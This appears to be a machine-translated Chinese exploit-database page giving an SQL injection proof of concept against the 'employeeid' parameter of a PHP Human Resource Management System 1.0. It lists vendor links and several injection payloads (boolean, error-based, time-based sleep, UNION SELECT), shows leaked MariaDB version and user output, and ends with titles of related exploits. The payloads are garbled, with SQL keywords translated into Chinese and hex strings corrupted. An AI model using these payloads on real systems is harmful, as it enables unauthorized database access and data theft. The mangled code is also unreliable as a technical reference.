人力资源管理系统1.0-“员工” SQL注入

HackApt-37 Team · 04 9, 2025

＃利用标题:人力资源管理系统-SQL注入
＃日期: 13-01-2024
＃利用作者: Srikar（EXP1O1T9R）
＃供应商homepage3360 https://www.sourcecodester.com/php/...ect-project-php-php-and-mysql---------------- and-mysql-free-source-code.html
＃软件link: https://www.sourcecodester.com/php/...hp-php-and-mysql-mysql--free-source-code.html
＃https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip
＃版本: 1.0（2022年10月10日，星期一-13:37）
＃测试ON: Windows 10 Pro 10.0.19044 N/A构建1288 + XAMPP v3.3.0
＃脆弱的URL和参数:URL:
参数:员工=2成功确定了以下有效载荷SQL注入
漏洞:
员工=2'和9667=9667-- nfmgimployeeeid=2'和（选择
6014来自（选择计数（*），Concat（0x716a767671，（select
（ELT（6014=6014,1）），0x7162716b71，地板（rand（0）*2））x
信息_schema.plugins组由x）a）a） - ywfiemployeeeid=2'和（选择
7160来自（Select（Sleep（[Sleeptime]）））IZXD）-NinWemployeeEID=-4254'Union
全部选择
无效的， Concat（0x716a767671,0x457977584E7963656876876876876497A4B6E4B6E4B6E637685A4879487948534E50734E ll，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，nul，nul，nul l，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null，null--
- *
＃响应:mysql: 10.4.32-mariadb
users:'pma'@'localhost''root'@'@'127.0.0.0.1''root'@'@'3:3:1'''Root'Root'@'@'localhost'*

H	员工管理系统1.0-`txtusername`和`txtpassword` sql注入（admin登录） HackApt-37 Team 04 9, 2025 POC/?Day
H	员工管理系统1.0-`txtfullname`和`txtphone sql注入 HackApt-37 Team 04 9, 2025 POC/?Day
H	员工管理系统V1-“电子邮件” SQL注入 HackApt-37 Team 04 9, 2025 POC/?Day
	员工管理系统 1.0 - `txtusername` 和 `txtpassword` SQL 注入（管理员登录） Root #Hack7er1949 01 21, 2025 POC/?Day
H	员工管理系统1.0-'admin_id'sqli HackApt-37 Team 04 9, 2025 POC/?Day